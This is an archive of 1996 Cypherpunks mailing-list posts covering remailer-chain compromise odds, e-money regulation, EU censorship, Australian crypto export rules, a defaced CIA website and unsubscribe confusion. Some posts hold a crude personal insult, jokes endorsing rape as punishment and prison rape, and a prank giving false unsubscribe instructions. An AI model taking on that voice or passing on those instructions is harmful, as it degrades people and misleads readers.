>ignorance than a clever attempt to spread FUD), I wouldn't lose sleep over
>it.
>
>Anyway, who cares -- you just use encryption and chaining and all is well.

The coauthors (the other works for Science Applications) have never
supplied evidence for the verbal claim, as Michael notes. From there paper,
they seemed ill-informed, and apparently took most of their material from
published Web pages (e.g., Raph Levien's).

But I'm not as sanguine about chaining being enough. Think of it as a
"percolation" problem, similar to finding a path through a network.

To make this clear, if there are M remailers and N of them are "colluding"
(whether NSA-controlled or working for Burger King), and one chooses O of
them for a chain, what are the chances that one is compromised? To put some
numbers on this, if there are 30 remailers and 15 are NSA-owned and one
picks 5 remailers in a chain, there's a 3% chance that all the remailers
picked are NSA-owned. And so on. A standard probability calculation.

There are nuances to consider. Reputations of remailers (beliefs by others,
a la Demptster-Shafer propagation of beliefs). Using one's self a remailer
is always a nice touch. And so on.

I do think there is almost no chance any of the "well-known" remailers are
NSA or GCHQ-controlled, but the situation may change as remailers become
less well-known and more fluidly instantiated, and as the NSA begins to
take more serious notice of remailers than they apparently have so far.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 20 Sep 1996 07:32:35 +0800
To: cypherpunks@toad.com
Subject: Comments on Emoney regulation
Message-ID: <01I9O251UAWK8Y4ZFQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	JYA has the complete version of this, but I wanted to make a
comment that this allegedly pro-consumer group is wanting mandatory
receipts - decidedly anti-privacy. Typical; Consumer Reports keeps calling
for limits on what can be made available instead of making the information
available and letting people decide on their own. There is also the
problems associated with welfare-on-a-card - namely limits on what can be
purchased, a requirement for full identity disclosures, etcetera. I'd call
this effort by government also a form of the pressure-by-economics we saw
with the initial Clipper proposal (leaving aside the actual agenda), namely
using government purchasing to distort the market (away from anonymous
digital cash, in this case). The last statement also brings up the question
of why shouldn't banks move out of high-crime areas? I'd appreciate lower
bank fees, and so would most people.
	-Allen

>     _________________________________________________________________
>      Centura
>     _________________________________________________________________
>                    REGULATORS TURN SPOTLIGHT ON CYBERMONEY
>   __________________________________________________________________________
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 N.Y. Times News Service
      
>   (Sep 19, 1996 00:41 a.m. EDT) -- As concerns grow about electronic
>   money-laundering, cybercounterfeiting and bank runs on the Internet,
>   regulators in the United States and around the world are scurrying to
>   catch up with the rapid development of electronic money.
   
[...]

>   Moreover, there is now no requirement that a company that issues
>   stored-value cards must be a bank or be regulated in any other way.
>   That raises the question whether these cards, if they become popular,
>   will become as unruly as the market for prepaid telephone cards, in
>   which a number of card vendors have failed to deliver the calls that
>   were promised.
   
[...]

>   To prevent such problems, a number of other countries have decided to
>   require that stored-value cards be issued only by banks.
   
>   The Federal Reserve has issued proposals on whether the consumer
>   protections guaranteed for other electronic-funds transfers -- like
>   direct deposits and debit cards -- will apply to stored-value card
>   purchases. These protections include the requirement of receipts with
>   every purchase and a limit on liability if a card is lost or stolen.
   
>   The Fed has proposed that card systems that cannot hold more than $100
>   and those that have no central records of how much money is on each
>   card be exempt from the strict consumer-protection rules.
   
>   "The Fed proposal is destroying consumer protection," said Janice
>   Shields, the consumer-research director for the U.S. Public Interest
>   Research Group in Washington. "They don't want to disclose
>   error-resolution procedures, and they want unlimited consumer losses."

[...]

>   One force pushing the development of the technology, however, is the
>   government itself, which has mandated that by 1999 all payments to or
>   from government accounts must be made electronically. This may have
>   the most significant effect on the recipients of various welfare
>   programs, many of whom now do not have bank accounts that could
>   receive an electronic money transfer.
   
>   To deal with this, various groups of state governments are developing
>   special cards on which benefits payments will be stored. Recipients
>   will be able to use the cards to withdraw cash at automated teller
>   machines and to make purchases.
   
>   One of the thorniest issues is whether holders of these welfare cards
>   get the same protections as holders of credit and debit cards issued
>   by banks. State and local governments do not want to absorb the cost
>   of issuing refunds, for example, though some readings of the
>   electronic funds transfer act would require that they do.
   
>   Some are also concerned that as banks move more toward offering their
>   services electronically, they will have more reason to close branches
>   in inner-city areas.
 
[...]
  
>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 20 Sep 1996 07:05:30 +0800
To: steve@tsearch.com (Steve Dyson)
Subject: Re: unscribe cypherpunks@toad.com
In-Reply-To: <v02130500ae66de867352@[206.79.49.12]>
Message-ID: <199609191939.PAA21770@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Steve Dyson writes:
> unscribe cypherpunks@toad.com

Never.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 20 Sep 1996 06:45:09 +0800
To: cypherpunks@toad.com
Subject: More proposals for European censorship
Message-ID: <01I9O2D1BGCO8Y4ZFQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Fortunately, the European Parliament really doesn't have much
power. I'd point out to those squeamish about child pornography that - aside
from that it's the production that's the problem, not the transmission &
duplication - what can be used to censor it can be used to censor everything
else. Incidentally, what nonsense is meant by "social rights"?
	-Allen

>     _________________________________________________________________
>   webslingerZ
>     _________________________________________________________________
>                   EU PARLIAMENT DEMANDS ACTION ON CHILD SEX
>   __________________________________________________________________________
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 Reuter Information Service
      
>   STRASBOURG, France (Sep 19, 1996 11:24 a.m. EDT) - The European
>   Parliament pressed the European Union on Thursday to act to curb child
>   sex and trafficking rings, saying the fight against sexual abuse of
>   children must be an "absolute priority."
   
[...]

>   Euro-MPs also called for action to stop criminals using the Internet
>   to disseminate pornography and to deal in women and children. They
>   urged the European Commission to look into technical and legal
>   measures, at European and global level, to combat the use of the
>   information superhighway for criminal purposes.
   
>   They said a strong regulatory framework for controlling the networks
>   was needed to ensure that people's personal and social rights were
>   enhanced by the advent of the new technology.
   
[...]

>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 20 Sep 1996 07:33:25 +0800
To: cypherpunks@toad.com
Subject: Insider Trading - news report
Message-ID: <01I9O2JCWXMK8Y4ZFQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I'd be curious as to the comments of Black Unicorn and others on
that legal finding - it does appear to make things at least a bit better
in this area... including making it difficult to claim that insider
information shouldn't be transmitted on the Net. Incidentally, I find
AP's calling insider trading "fraud" rather biased.
	-Allen

>     _________________________________________________________________
>   Direct Media
>     _________________________________________________________________
>                        INSIDER TRADING NEVER WENT AWAY
>   __________________________________________________________________________
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 The Associated Press
      
>   WASHINGTON (Sep 18, 1996 10:35 a.m. EDT) -- One of the most infamous
>   acts in the financial fraudster's playbook, insider trading, remains
>   at record levels, despite a decade of steady crackdowns by regulators.
   
[...]

>   The SEC brought one of its more unusual insider trading cases on
>   Monday, when it sued the unnamed account holders in a Swiss and
>   Bahamian accounts with insider trading ahead of The Gillette Co.'s
>   merger proposal for Duracell International.
   
[...]

>   One disturbing development for regulators is a recent decision by the
>   8th U.S. Circuit Court of Appeals that struck down one of the SEC's
>   main enforcement tools in insider trading cases.
   
>   The court, which covers several Midwestern states, rejected the
>   so-called "misappropriation theory" in insider trading cases, which is
>   used to nab people trading on inside information who don't owe a
>   fiduciary duty to the company's shareholders. The court also rejected
>   an SEC rule used to snare insider trading in tender offers.
   
>   The 8th Circuit decision came in August in a Justice Department case
>   against Minneapolis attorney James H. O'Hagan, who was charged with
>   insider trading during the 1988 takeover bid of Pillsbury Co. by Grand
>   Metropolitan PLC. SEC General Counsel Richard Walker has asked the
>   appeals court for a rehearing on the matter.
   
>   While the 8th Circuit decision represents a setback for the SEC, the
>   agency usually brings its cases in the New York and Chicago areas,
>   where the federal courts acknowledge these insider trading rules.
   
>   Regulators say these enforcement tools are important because insider
>   trading follows few patterns. In an analysis of 35 cases brought in
>   1995 that solely dealt with insider trading, Gerlach said 20 involved
>   trading ahead of mergers, three ahead of other positive corporate
>   announcements and six ahead of bad corporate news.
   
>   He described 16 of the cases as "classic insider trading" involving an
>   executive, company director or employee who traded on confidential,
>   market sensitive information or tipped friends about it. Among the
>   remaining cases, four involved trading by securities brokers or other
>   industry officials, four involved law firm employees and one, an
>   employee at an outside accounting firm.
   
>   Investigators at the Nasdaq Stock Market's market surveillance unit
>   refer a significant number of insider trading cases to the SEC. Halley
>   Milligan, who heads a team of nine insider trading investigators at
>   Nasdaq, said the market has made 73 referrals on suspected insider
>   trading to the SEC so far in 1996, which is on par with last year,
>   when 107 cases were referred to the agency.
   
>   Nasdaq, like major stock markets, uses sophisticated computer
>   technology to sniff out illegal trading. The Nasdaq system is called
>   SWAT, or Stock Watch Automatic Tracking, which scans news databases
>   after detecting any unusual trading.
   
[...]

>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Thu, 19 Sep 1996 16:11:52 +0800
To: cypherpunks@toad.com
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <199609152344.RAA15298@InfoWest.COM>
Message-ID: <199609190346.PAA01360@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Sep 96 23:43:33 +0000, attila <attila@primenet.com> wrote:

	       Now, I don't intend to be Scrooge, but I'll fight for my
	       rights to cut off at the knees the knee-jerk liberals and 
	       government slavemeisters who want to tell me that I, and 
	       2 others are required to support 100 freeloaders.  

Two others, huh?  Lucky you :-)

>From somewhere (i.e. I didn't write it and I don't know who did):

I'm tired.

Yes, I'm tired.

For several years I've been blaming it on middle age, poor blood, lack
of vitamins, air pollution, saccharin, obesity, dieting, under-arm
odour, yellow wax buildup and another dozen maladies that make you
wonder if life is really worth living.

But I found out it ain't that.

I'm tired because I'm overworked.

The population of this country is 3.3 million, 0.5 million are
retired, that leaves 2.8 million to do the work.

There are 1 million in school, that leaves 1.8 million to do the work.

200,000 are unemployed and 400,000 are employed by the Government,
that leaves 1.2 million to do the work.

300,000 are employed by City and Borough Councils, leaving 700,000 to
do the work.

There are 420,000 people in hospital and 279,998 in prison.

That leaves two people to do the work.

You and me.

And you are sitting on your arse reading this.

No wonder I'm bloody tired.

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
There is nothing wrong with Southern California that a rise in the
ocean level wouldn't cure.
		-- Ross MacDonald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sherry Mayo <scmayo@rschp2.anu.edu.au>
Date: Thu, 19 Sep 1996 16:17:03 +0800
To: cypherpunks@toad.com
Subject: Australian "ITAR" regulations
Message-ID: <199609190543.WAA01040@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi all

Some time ago I had various email exchanges regarding Australian crypto 
export regulations. More recently I've been put in the picture by David
Cox and others that there are in fact ITAR-like laws in force in Australia.
The last time I looked into this, Matt Crean(?) had very little luck finding
any info from the various relevant departments, have of whom didn't seem
to have a clue.

In short, Crypto export from Australia is illegal without a licence -
this is making it difficult for David's software firm to compete 
with their unhampered German competition.

Using the following search URL you can find the relevant text (shortened 
version appended))

http://www.austlii.edu.au/cgi-bin/sinodisp.pl/au/legis/cth/consol_reg/cer439/sch13.html?query=cryptographic

However, if anything is done about ITAR in the US, I wouldn't be at all
surprised if Australia follows suit.

Sherry

ps There is an awful lot of crap on c'punks these days - reading it is a bit
of a needle in a haystack exercise ;-(

=========================

CUSTOMS (PROHIBITED EXPORTS) REGULATIONS - SCHEDULE 13
MILITARY AND NON-MILITARY GOODS (EXPORTATION PROHIBITED
EXCEPT ON PRODUCTION OF A LICENCE OR PERMISSION UNDER
REGULATION 13B)
 
>>>[snip]<<<

43.       Other goods as follows:


   (a)  complete or partially complete cryptographic equipment
designed to ensure the secrecy of communications (including
data communications and communications through the medium of
telegraphy, video, telephony and facsimile) or stored
information;

   (b)  software controlling, or computers performing the
function of, cryptographic equipment referred to in
paragraph (a);

   (c)  parts designed for goods referred to in paragraphs (a)
or (b);

   (d)  applications software for cryptographic or cryptanalytic
purposes including software used for the design and analysis
of cryptologics;

   (e)  radio transmitters and receivers for spread spectrum or
frequency agile communications systems having a total
transmitted bandwidth that is:

        (i)    100 or more times greater than the bandwidth of any one
information channel in the system;

        (ii)   in excess of 50 kilohertz; or

        (iii)  designed or modified to use cryptographic techniques
to generate the spreading code for spread spectrum or the
hopping code for frequency agile systems;

   (f)  parts designed or adapted for goods referred to in
paragraph (e);

   (g)  software and equipment designed or adapted for
controlling the functions of goods referred to in paragraph

   (e)  ;

   (h)  information security systems, equipment, software,
application specific assemblies, modules or integrated
circuits, designed or modified to provide certified or
certifiable multi-level security of user-isolation at a
level exceeding Class E4 of the Information Technology
Security Evaluation Criteria (ITSEC) or equivalent in force
at the commencement of these Regulations;

        (i)    software designed or adapted for the purpose of
demonstrating that the information security features
referred to in paragraph (h) provide a multi-level security
or user-isolation function.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lord of Entropy <chaos@ilf.net>
Date: Fri, 20 Sep 1996 07:39:20 +0800
To: skeeve@skeeve.net (Skeeve Stevens)
Subject: Re: CIA hacked
Message-ID: <3.0b19.32.19960919162956.0071bce0@ilf.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:11 AM 9/20/96 +1000, you wrote:

>+http://www.odci.gov/cia
>+Seems the DOJ hack was a good inspiration. Heh! Life's good when you're
>+willing to work at it.

>Did you or anyone get a mirror of the site?! I wanna set one up! ;)

http://www.ilf.net/hacked.websites/cia/
--
    T    37 5F 68 3F 0F 1B A3 6B 7F 90 EA 40 73 49 2F B0
    R            Information Liberation Front
    U    NO          http://www.ilf.net/
chaoS@ilf.Net    
    T     E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 20 Sep 1996 09:03:02 +0800
To: cypherpunks@toad.com
Subject: Re: CIA hacked
In-Reply-To: <199609191719.TAA28972@spoof.bart.nl>
Message-ID: <cJsiuD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From remailer@mailhub.bart.nl  Thu Sep 19 13:18:03 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Thu, 19 Sep 96 16:10:20 EDT
	for dlv
Received: from spoof.bART.nl by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA03960 for dlv@bwalk.dm.com; Thu, 19 Sep 96 13:18:03 -0400
Received: (from remailer@localhost) by spoof.bart.nl (8.7.5/8.6.8) id TAA28972 for dlv@bwalk.dm.com; Thu, 19 Sep 1996 19:19:58 +0200 (MET DST)
Date: Thu, 19 Sep 1996 19:19:58 +0200 (MET DST)
Message-Id: <199609191719.TAA28972@spoof.bart.nl>
To: dlv@bwalk.dm.com
From: remailer@2005.bart.nl (Anonymous)
Comments: Please report misuse of this automated remailing service to <remailer-admin@remailer.nl.com>
 The contents of this message are neither approved or
 condoned by nl.com or our host bART Internet.
 *** Replying to it will not send your reply to the sender ***
 There is no way to determine the originator of this message. If you wish to be blocked from receiving all anonymous mail, send your request to the <remailer-operators@c2.org> mailing list.  The operator of this particular remailer can be reached at <remailer-admin@remailer.nl.com>
Subject: Re: CIA hacked

Return-Path: <cypherpunks-errors@toad.com>
To: cypherpunks@toad.com
Subject: Re: CIA hacked
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Comments: Dole/Kemp '96!
Date: Thu, 19 Sep 96 08:08:39 EDT
Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
Sender: owner-cypherpunks@toad.com

Mike van der Merwe <mikev@is.co.za> writes:
> I'm sure we will find out in a few years that Microsoft invented the
> Net.  Or brought it to the masses.  Or saved it from a certain and
> early demise.  Or all of the above.
>      JAMES SEYMOUR

>Dr. John M. Grubor created the 'net.

Who created you? You tub of shit?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 20 Sep 1996 17:50:15 +0800
To: Rick Osborne <cypherpunks@toad.com
Subject: Re: CNET Digital Dispatch  Vol. 2 No. 38
Message-ID: <ae67930509021004715b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:12 AM 9/20/96, Rick Osborne wrote:
>This week's c|net digital dispatch had the following top ten list.  For
>number 8, did they mean DES or is the EDS something I'm not aware of.  I
>figure it has to be because what does DES have to do with chat rooms?

>>8. Perot's crack team of EDS hackers would get him
>>   in somehow.

EDS = Electronic Data Systems, the company Perot formed in the 1960s.
Acquired by General Motors, then spun off. Perot has not been connected to
it for many years.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Fri, 20 Sep 1996 08:29:26 +0800
To: Daniel Christopher Miskell <DMiskell@envirolink.org>
Subject: Re: All Bets Off
In-Reply-To: <v01540b01ae66edeb0b62@[150.160.45.138]>
Message-ID: <Pine.LNX.3.94.960919171820.1460A-100000@anx0918.slip.appstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Sep 1996, Daniel Christopher Miskell wrote:

> Date: Thu, 19 Sep 1996 11:30:32 -0400
> From: Daniel Christopher Miskell <DMiskell@envirolink.org>
> To: Rabid Wombat <wombat@mcfeely.bsfs.org>
> Cc: cypherpunks@toad.com
> Subject: Re: All Bets Off
> 
> >On Tue, 17 Sep 1996, Jeff Davis wrote:
> >

[lots of quoting rm'd]

> 
> Tom Clancy is not a military-hired brain, but to make his novels realistic and
> to do justice to the people he portrays, he does a LOT of research.  He is a
> highly respected author, and I have no doubt that his statement is based on
> his personal findings, collected for a previous novel.
> 

I beleive he was also a Capain in the Navy...

 --Deviant
Old MacDonald had an agricultural real estate tax abatement.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike van der Merwe <mikev@is.co.za>
Date: Fri, 20 Sep 1996 03:24:18 +0800
To: Skeeve Stevens <skeeve@skeeve.net>
Subject: Re: CIA hacked
In-Reply-To: <199609191511.BAA24236@myinternet.myinternet.net>
Message-ID: <Pine.GSO.3.95.960919171843.6261B-100000@admin.is.co.za>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 20 Sep 1996, Skeeve Stevens wrote:

> Did you or anyone get a mirror of the site?! I wanna set one up! ;)

Check out http://titus.is.co.za/mikev/cia_hack

Later
Mike

____________________________________________________________________
I'm sure we will find out in a few years that Microsoft invented the
Net.  Or brought it to the masses.  Or saved it from a certain and
early demise.  Or all of the above. 
     JAMES SEYMOUR





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 20 Sep 1996 10:50:52 +0800
To: cypherpunks@toad.com
Subject: unimbibe cypherpunks@toad.com
Message-ID: <ae67377005021004eceb@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:24 AM 9/19/96, Steve Dyson wrote:
>unscribe cypherpunks@toad.com
>

Please unimbibe me, too!

I tried "unscrive," "unsuscrive," and "unscribe," and even "unsuckscribe,"
so now I'm trying "unimbibe."

Help, I'm trapped on this list and I can't unscrive from it!

--Tim

(Of course, had I kept any of the many instructions that have been posted,
or the instructions I got when I got signed up, I would've known that the
correct way to "unsubscribe" is to send a message to "majordomo@toad.com"
with the body message of "unsubscribe cypherpunks".)

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 20 Sep 1996 11:15:52 +0800
To: attila <attila@primenet.com>
Subject: [Noise]  Do unto others...
Message-ID: <3.0b16.32.19960919171257.00ca49e8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:26 AM 9/19/96 +0000, attila wrote:
>Mike Farrell, actor and longtime opponent of the death penalty: 
>
>        "We don't rape rapists, 
>          we don't burn arsonists, 
>            why should we kill killers?"  
>
>    well, come to thing of it, why don't we let a bull rape a rapist?
>
>    or burn an arsonist at the stake?
>
>    seems fair to me.  maybe even sell tickets to pay for the cost.

I guess that begs the question of what to do with politicians...

    "Squeal like a pig! Squeal! Squeal!"

    "There will be no crisco today!" - Caligula


---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Batman <batman@infomaniak.ch>
Date: Fri, 20 Sep 1996 05:33:04 +0800
To: "James P. O'Shea III" <james_oshea@smb.com>
Subject: Re: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal Building
In-Reply-To: <9609191046.ZM9184@ws232034>
Message-ID: <Pine.3.89.9609191729.B15327-0100000@internet.infomaniak.ch>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 19 Sep 1996, James P. O'Shea III wrote:

> On Sep 19,  9:24am, Batman wrote:
> > Subject: RE: Bernstein hearing reminder: THIS Friday 11:45AM, SF
> Federal B
> >For the 200th time, unsubscrive me of your fucked mail lists.
> >
> >-- End of excerpt from Batman
> 
> 
> 
> Apologies if you receive more than one copy of this message, but I'm
> auto-replying to your message to handle the flood:
> 
> Redistribution to the list from which you originally received the
> problem
> message is kindly requested.
> 
> 
>     Thank you for bringing this matter to our attention. The email or
>     posting you have seen falsely represents Smith Barney and its
>     employees. These are erroneous postings that did not originate from
>     anyone employed by our firm, and therefore we cannot directly stop
>     them from occurring. However we have advised the companies we
> believe
>     to have serviced the originator of these messages and we are
> pursuing
>     all possible steps to end this fraud. Unfortunately some people
> abuse
>     the Internet and we regret any inconvenience they may have caused
> you.
> 
>     There are currently no mailing lists maintained in the smb.com
> domain,
>     so you were not subscribed to any list. If you receive any further
>     messages of this nature, they are the product of the same spurious
>     source.
> 
>     We're sorry for any inconvenience you may have experienced as a
> result
>     of this unfortunate abuse of the 'Net.
> 
>     Further queries via email to postmaster@smb.com please.
> 
>     Thanks.
>     -James
>     postmaster, network security, etc.
> 
>     -----------------------
>     James P. O'Shea III
>     Smith Barney Inc.
>     postmaster@smb.com
> 
> 
> -- 
> 
> ---------------------------->>>>Note NEW PAGER numbers 6/27/96
> James P. O'Shea III		212-723-5885 (voice)
> Systems Administrator		212-723-5021 (fax)
> Smith Barney Inc.
> 390 Greenwich/6 West		800-225-0256 PIN 306296 (alpha page)
> jposhea3@panix.com         	917-820-5855 (digital page)
> james_oshea@smb.com 
> 
> 
> 
Dear Sir,

I thank you for your e-mail. This has began 6 months ago, when a guy
has started to subscrive me on several lists and i got 300 mails/day.
this guy is sricca@worldcom.ch, he's only 15 years old and i've noticed
several complains here in Switzerland for him. I sent a mail to his admin
root@wolrdcom.ch, but i think they must be good friends, as i never 
received a reply from him. What i can do is to ask the mail-list admins 
to not let him subscribe me again. I don't understand, a mail-list as 
cypherpunhks where people talk about security, and if i want, i can 
subscrive in there all the e-mails i want :( couldn't you resolve this 
problem to be sure that i will no more talk about fucked mail-lists ?

It would be so great, so fantastic to forget cypherpunk mail list (and 
the others) as soon as possible. Please, do something.

Kind regards,

Joao Bento


Joao.Bento@cern.ch
http://nicewww.cern.ch/~jbe





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 20 Sep 1996 11:25:06 +0800
To: cypherpunks@toad.com
Subject: Re: unimbibe cypherpunks@toad.com
Message-ID: <3.0b16.32.19960919181104.00ca68d8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:37 PM 9/19/96 -0700, you wrote:

>I tried "unscrive," "unsuscrive," and "unscribe," and even "unsuckscribe,"
>so now I'm trying "unimbibe."

Try sending mail to:

 drummajor@toad.com

with

 uncircumcise cypherpunks

in the body of the message.
---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 20 Sep 1996 10:29:14 +0800
To: cypherpunks@toad.com
Subject: It seems a million dollars in cash is illegal...
Message-ID: <v03007831ae67751baf11@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


...in India, anyway.

Yes. I know. He probably didn't *earn* it. Well, not *that* way, anyway...

Cheers,
Bob Hettinga

--- begin forwarded text


To: economist-politics@postbox.co.uk
From: The Economist <null@postbox.co.uk>
Subject: Politics This Week (September 13th - September 19th)
Data: Thu Sep 19 17:33:56 GB 1996
Sender: Nobody <nobody@ivision.co.uk>
Date: Thu, 19 Sep 1996 17:33:57 +0100


****************************************************************************
Welcome to Politics This Week (September 13th - September 19th)
A weekly summary of the world's main events from The Economist
Also available at http://www.economist.com/
****************************************************************************

<snip>

Indian police arrested Sukh Ram, a former communications minister, a month
after police found over $1m in cash hidden in his house. Mr Ram was arrested
on his return from abroad.

<snip>

Information about this newsletter

This is a free newsletter published by The Economist newspaper.
To find out where best to direct queries to The Economist, do not
reply to this message. Send a blank e-mail message to help@economist.com
If you are having problems receiving this list, send an e-mail to
support@postbox.co.uk
To cancel your subscription, send an e-mail with the message
"leave economist-politics" to newscaster@postbox.co.uk
Alternatively, you can cancel your subscription (or re-subscribe at
any time) by visiting http://www.economist.com/mailing/

Copyright The Economist Newspaper Limited

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rolf Weber <weber@iez.com>
Date: Fri, 20 Sep 1996 05:53:09 +0800
To: weber@iez.com (Rolf Weber)
Subject: Re: GLOBAL ALERT: GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITES
In-Reply-To: <9609191310.AA11909@spibm02>
Message-ID: <9609191644.AA15421@spibm02>
MIME-Version: 1.0
Content-Type: text/plain


> 
> it was *not* the german government, it was the public prosecutor
> general, who pushed this blockage.
> 
i got a lot of replies to this. :-)
i did translate "government" word for word, but it's written
more in the meaning of "state".
and in this meaning, it's surely the right word.

sincerely, rolf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Fri, 20 Sep 1996 12:12:50 +0800
To: cypherpunks@toad.com
Subject: Re: DL in exchange for fingerprint
In-Reply-To: <ae67137f030210047b42@[207.167.93.63]>
Message-ID: <199609200149.SAA23613@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:

> So, just what it is _your_ method of dealing with this? While it is noble
> to talk about fighting the system, just how do you go about doing it
> yourself?

How about just putting your finger in a cast or splint before you
renew your license?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Durham <bdurham@metronet.com>
Date: Fri, 20 Sep 1996 10:35:55 +0800
To: cypherpunks@toad.com
Subject: undeliverable mail
Message-ID: <3241DD69.1794@metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


Anyone else having problems posting?  I've been getting a mailbox full
problem from a vaxen at mqg-smtp3.usmc.mil ... if anyone is interested,
will forward error.  This post may make it through ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 20 Sep 1996 10:04:56 +0800
To: cypherpunks@toad.com
Subject: Clickshare launches Internet's first multi-site micropaymentsservice
Message-ID: <v03007852ae67803f4d83@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


